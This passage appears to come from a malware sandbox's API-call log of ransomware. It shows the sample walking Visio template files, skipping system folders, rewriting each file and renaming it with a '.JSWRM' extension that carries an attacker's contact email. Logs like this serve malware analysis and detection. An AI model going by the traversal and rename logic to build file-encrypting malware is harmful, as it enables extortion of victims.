[0145.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.188] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=24339) returned 1 [0145.188] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.189] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5f10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5f10, lpOverlapped=0x0) returned 1 [0145.194] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.195] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5f10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5f10, lpOverlapped=0x0) returned 1 [0145.195] CloseHandle (hObject=0x314) returned 1 [0145.195] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.196] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf1d7, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLOCKS.DWG", cAlternateFileName="")) returned 1 [0145.196] lstrcmpiW (lpString1="BLOCKS.DWG", lpString2=".") returned 1 [0145.196] lstrcmpiW (lpString1="BLOCKS.DWG", lpString2="..") returned 1 [0145.196] lstrcmpiW (lpString1="BLOCKS.DWG", lpString2="...") returned 1 [0145.196] lstrcmpiW (lpString1="BLOCKS.DWG", lpString2="windows") returned -1 [0145.196] lstrcmpiW (lpString1="BLOCKS.DWG", lpString2="recovery") returned -1 [0145.196] lstrcmpiW (lpString1="BLOCKS.DWG", lpString2="perflogs") returned -1 [0145.196] lstrcmpiW (lpString1="BLOCKS.DWG", lpString2="documents and settings") returned -1 [0145.196] lstrcmpiW (lpString1="BLOCKS.DWG", lpString2="$RECYCLE.BIN") returned 1 [0145.196] lstrcmpiW (lpString1="BLOCKS.DWG", lpString2="system volume information") returned -1 [0145.196] lstrcmpiW (lpString1="BLOCKS.DWG", lpString2="msocache") returned -1 [0145.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKS.DWG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0145.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKS.DWG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCKS.DWG", lpUsedDefaultChar=0x0) returned 10 [0145.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKS.DWG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0145.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKS.DWG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCKS.DWG", lpUsedDefaultChar=0x0) returned 10 [0145.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKS.DWG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blocks.dwg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.198] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=61911) returned 1 [0145.198] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.198] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xf1d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xf1d0, lpOverlapped=0x0) returned 1 [0145.207] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.207] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xf1d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xf1d0, lpOverlapped=0x0) returned 1 [0145.208] CloseHandle (hObject=0x314) returned 1 [0145.208] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKS.DWG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blocks.dwg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKS.DWG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blocks.dwg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.209] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2e8e3f2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x2e8e3f2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x2e8e3f2, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x16720, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLOCK_M.VSSX", cAlternateFileName="BLOCK_~1.VSS")) returned 1 [0145.209] lstrcmpiW (lpString1="BLOCK_M.VSSX", lpString2=".") returned 1 [0145.209] lstrcmpiW (lpString1="BLOCK_M.VSSX", lpString2="..") returned 1 [0145.210] lstrcmpiW (lpString1="BLOCK_M.VSSX", lpString2="...") returned 1 [0145.210] lstrcmpiW (lpString1="BLOCK_M.VSSX", lpString2="windows") returned -1 [0145.210] lstrcmpiW (lpString1="BLOCK_M.VSSX", lpString2="recovery") returned -1 [0145.210] lstrcmpiW (lpString1="BLOCK_M.VSSX", lpString2="perflogs") returned -1 [0145.210] lstrcmpiW (lpString1="BLOCK_M.VSSX", lpString2="documents and settings") returned -1 [0145.210] lstrcmpiW (lpString1="BLOCK_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0145.210] lstrcmpiW (lpString1="BLOCK_M.VSSX", lpString2="system volume information") returned -1 [0145.210] lstrcmpiW (lpString1="BLOCK_M.VSSX", lpString2="msocache") returned -1 [0145.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0145.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0145.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0145.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0145.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.212] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=91936) returned 1 [0145.212] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.212] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x16720, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x16720, lpOverlapped=0x0) returned 1 [0145.220] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.220] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x16720, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x16720, lpOverlapped=0x0) returned 1 [0145.221] CloseHandle (hObject=0x314) returned 1 [0145.221] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.223] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4986ebe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4986ebe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4986ebe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4fe1, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLOCK_M.VSTX", cAlternateFileName="BLOCK_~1.VST")) returned 1 [0145.223] lstrcmpiW (lpString1="BLOCK_M.VSTX", lpString2=".") returned 1 [0145.223] lstrcmpiW (lpString1="BLOCK_M.VSTX", lpString2="..") returned 1 [0145.223] lstrcmpiW (lpString1="BLOCK_M.VSTX", lpString2="...") returned 1 [0145.223] lstrcmpiW (lpString1="BLOCK_M.VSTX", lpString2="windows") returned -1 [0145.223] lstrcmpiW (lpString1="BLOCK_M.VSTX", lpString2="recovery") returned -1 [0145.223] lstrcmpiW (lpString1="BLOCK_M.VSTX", lpString2="perflogs") returned -1 [0145.223] lstrcmpiW (lpString1="BLOCK_M.VSTX", lpString2="documents and settings") returned -1 [0145.223] lstrcmpiW (lpString1="BLOCK_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.223] lstrcmpiW (lpString1="BLOCK_M.VSTX", lpString2="system volume information") returned -1 [0145.223] lstrcmpiW (lpString1="BLOCK_M.VSTX", lpString2="msocache") returned -1 [0145.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0145.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0145.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0145.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0145.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.224] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20449) returned 1 [0145.224] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.224] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4fe0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4fe0, lpOverlapped=0x0) returned 1 [0145.229] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.229] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4fe0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4fe0, lpOverlapped=0x0) returned 1 [0145.229] CloseHandle (hObject=0x314) returned 1 [0145.229] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.230] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x39951ab, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x39951ab, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x39951ab, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x15739, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLOCK_U.VSSX", cAlternateFileName="BLOCK_~2.VSS")) returned 1 [0145.230] lstrcmpiW (lpString1="BLOCK_U.VSSX", lpString2=".") returned 1 [0145.230] lstrcmpiW (lpString1="BLOCK_U.VSSX", lpString2="..") returned 1 [0145.230] lstrcmpiW (lpString1="BLOCK_U.VSSX", lpString2="...") returned 1 [0145.230] lstrcmpiW (lpString1="BLOCK_U.VSSX", lpString2="windows") returned -1 [0145.230] lstrcmpiW (lpString1="BLOCK_U.VSSX", lpString2="recovery") returned -1 [0145.230] lstrcmpiW (lpString1="BLOCK_U.VSSX", lpString2="perflogs") returned -1 [0145.230] lstrcmpiW (lpString1="BLOCK_U.VSSX", lpString2="documents and settings") returned -1 [0145.230] lstrcmpiW (lpString1="BLOCK_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0145.231] lstrcmpiW (lpString1="BLOCK_U.VSSX", lpString2="system volume information") returned -1 [0145.231] lstrcmpiW (lpString1="BLOCK_U.VSSX", lpString2="msocache") returned -1 [0145.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0145.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0145.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0145.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0145.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.232] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=87865) returned 1 [0145.232] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.232] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x15730, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x15730, lpOverlapped=0x0) returned 1 [0145.241] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.241] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x15730, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x15730, lpOverlapped=0x0) returned 1 [0145.242] CloseHandle (hObject=0x314) returned 1 [0145.242] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.244] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4986ebe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4986ebe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4986ebe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4eef, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLOCK_U.VSTX", cAlternateFileName="BLOCK_~2.VST")) returned 1 [0145.244] lstrcmpiW (lpString1="BLOCK_U.VSTX", lpString2=".") returned 1 [0145.244] lstrcmpiW (lpString1="BLOCK_U.VSTX", lpString2="..") returned 1 [0145.244] lstrcmpiW (lpString1="BLOCK_U.VSTX", lpString2="...") returned 1 [0145.244] lstrcmpiW (lpString1="BLOCK_U.VSTX", lpString2="windows") returned -1 [0145.244] lstrcmpiW (lpString1="BLOCK_U.VSTX", lpString2="recovery") returned -1 [0145.244] lstrcmpiW (lpString1="BLOCK_U.VSTX", lpString2="perflogs") returned -1 [0145.244] lstrcmpiW (lpString1="BLOCK_U.VSTX", lpString2="documents and settings") returned -1 [0145.244] lstrcmpiW (lpString1="BLOCK_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.244] lstrcmpiW (lpString1="BLOCK_U.VSTX", lpString2="system volume information") returned -1 [0145.244] lstrcmpiW (lpString1="BLOCK_U.VSTX", lpString2="msocache") returned -1 [0145.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0145.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0145.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0145.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0145.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.245] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20207) returned 1 [0145.245] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.245] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4ee0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4ee0, lpOverlapped=0x0) returned 1 [0145.248] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | 